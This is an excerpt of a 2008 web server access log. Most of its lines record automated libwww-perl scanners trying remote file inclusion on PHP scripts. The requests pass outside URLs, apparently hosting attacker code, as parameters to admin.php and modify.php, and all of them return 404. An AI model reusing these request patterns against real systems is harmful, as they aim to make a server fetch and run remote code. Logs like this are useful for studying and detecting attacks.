69.64.81.28 - - [28/May/2008:14:20:35 -0500] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 386 "-""libwww-perl/5.805"
69.64.81.28 - - [28/May/2008:14:20:35 -0500] "GET //phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 381 "-""libwww-perl/5.805"
216.167.156.20 - - [28/May/2008:14:21:36 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
216.167.156.20 - - [28/May/2008:14:21:36 -0500] "GET //modules/xfsection/modify.php?dir_module=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
65.55.208.135 - - [28/May/2008:14:23:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
